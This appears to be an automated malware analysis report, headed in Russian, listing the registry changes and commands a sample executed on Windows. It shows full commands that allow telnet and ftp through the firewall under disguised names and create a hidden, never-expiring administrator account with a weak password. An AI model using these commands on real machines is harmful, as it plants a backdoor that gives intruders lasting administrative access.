Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\telnet.exe' = '<SYSTEM32>\telnet.exe:*:Enabled:SecuritySuite'
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:SvchostConnection'
- <SYSTEM32>\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "Admins" /t reg_dword /d 0 /f
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\ftp.exe SvchostConnection
- <SYSTEM32>\netsh.exe firewall add allowedprogram <SYSTEM32>\telnet.exe SecuritySuite
- <SYSTEM32>\net1.exe localgroup Администраторы Admins /ADD
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\net1.exe user Admins 123456789 /expires:never /ADD
- <SYSTEM32>\net1.exe localgroup %USERNAME%s Admins /ADD
- %TEMP%\a59770.bat
- %TEMP%\a59770.bat